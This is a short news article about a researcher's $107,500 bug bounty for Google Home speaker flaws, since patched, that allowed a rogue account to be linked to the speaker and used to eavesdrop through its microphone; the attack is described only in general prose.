A Security Researcher Was Awarded $107500 For Identifying Security Issues In Google Home Smart Speakers: For discovering security flaws in Google Home smart speakers that could be used to install backdoors and convert them into wiretapping devices, a security researcher was given a bug prize of $107,500.
The flaws, according to the researcher who goes by the name Matt, “allowed an attacker within wireless proximity to install a ‘backdoor’ account on the device, enabling them to send commands to it remotely over the internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN.”
By sending such nefarious queries, the attacker might not only learn the Wi-Fi password but also gain direct access to other devices using the same network. Google corrected the problems in April 2021 after making a responsible disclosure on January 8, 2021.
In a nutshell, the issue is that a malicious Google user account can be added to a target’s home automation system by utilizing the Google Home software architecture.
In a series of attacks described by the researcher, a threat actor wishing to eavesdrop on a victim can persuade them to install a malicious Android app, which, when it discovers a Google Home device on the network, sends covert HTTP requests to connect the attacker’s account to the victim’s device.
A step further revealed that a Google Home device could be induced to enter “setup mode” and establish its own open Wi-Fi network by conducting a Wi-Fi de-authentication attack to force it to detach from the network.
Google Home speakers allowed hackers to snoop on conversations – @billtoulashttps://t.co/sugl8izVhz
— BleepingComputer (@BleepinComputer) December 29, 2022
In order to attach their account to the device, the threat actor can then connect to the device’s setup network and request information such as the device name, cloud device id, and certificate.
Whatever attack sequence is used, a successful link procedure enables the adversary to take advantage of Google Home routines to mute the device’s volume to zero and contact a specified phone number at any time to spy on the victim through the microphone.
The only thing the victim might notice is that the device’s LEDs change to solid blue, but Matt predicted they would simply assume that it was updating the firmware. There is no indication that the microphone is open during a call because the LEDs do not pulse as they usually do when the device is listening.
The attack can also be expanded to read files or add malicious modifications to the linked device that would take effect after a reboot, as well as make arbitrary HTTP requests within the victim’s network.
This is not the first time that assault strategies to secretly eavesdrop on potential targets using voice-activated gadgets have been developed.
A team of academics unveiled a method in November 2019 called “Light Commands,” which refers to a MEMS microphone flaw that enables attackers to remotely use light to inject invisible and inaudible commands into well-known voice assistants like Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri.
Read Next: